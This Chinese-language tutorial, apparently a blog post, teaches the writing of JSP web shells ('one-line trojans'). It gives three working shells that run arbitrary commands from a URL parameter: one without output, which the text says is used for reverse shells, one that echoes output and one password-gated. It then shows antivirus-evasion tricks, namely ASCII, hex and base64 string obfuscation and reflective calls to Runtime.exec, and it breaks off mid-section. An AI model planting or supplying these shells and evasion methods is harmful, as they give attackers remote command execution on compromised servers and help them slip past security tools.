一、無回顯一句話木馬
http://localhost/index.jsp?cmd=whoami
不會回顯執行的結果只能在後臺打印一個地址,常用來反彈shell
<%@ page contentType="text/html;charset=UTF-8" language="java" %> <html> <head> <title>一句話木馬</title> </head> <body> <% Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); System.out.println(process); %> </body> </html>
二、有回顯一句話木馬
<%@ page import="java.io.InputStream" %> <%@ page import="java.io.BufferedReader" %> <%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <html> <head> <title>一句話木馬</title> </head> <body> <% Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine())!=null){ response.getWriter().print(line); } %> </body> </html>
三、有密碼的回顯一句話木馬
<%@ page import="java.io.InputStream" %> <%@ page import="java.io.BufferedReader" %> <%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <html> <head> <title>一句話木馬</title> </head> <body> <% if ("password".equals(request.getParameter("p"))){ Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine())!=null){ response.getWriter().print(line); } } %> </body> </html>
四、免殺繞過
(一)JSP中的字符串混淆方式
package com.eleven.test; import sun.misc.BASE64Decoder; import javax.xml.bind.DatatypeConverter; import java.io.IOException; public class JspEncode { public static void main(String[] args) throws IOException { String a = new String(new byte[] {121,122,100,100,77,114,54}); System.out.println("ASCII: "+a); String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236")); System.out.println("HEX: "+ b); String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg==")); System.out.println("BASE64: "+c); } }
(二)類反射繞過
package com.eleven.test; import java.lang.reflect.Method; import java.util.Scanner; public class Test { public static void main(String[] args) throws Exception { String op = ""; Class rt = Class.forName("java.lang.Runtime"); //加載Runtime類 Method gr = rt.getMethod("getRuntime"); //獲取getRuntime方法 Method ex = rt.getMethod("exec", String.class); //獲取exec方法 Process e = (Process) ex.invoke(gr.invoke(null), "cmd /c whoami"); //invoke 傳參調用 //以下代碼是獲取輸出結果 Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A"); op = sc.hasNext() ? sc.next() : op; sc.close(); System.out.print(op); } }
那麼接下來就是把他放到jsp裏面。
利用base64編碼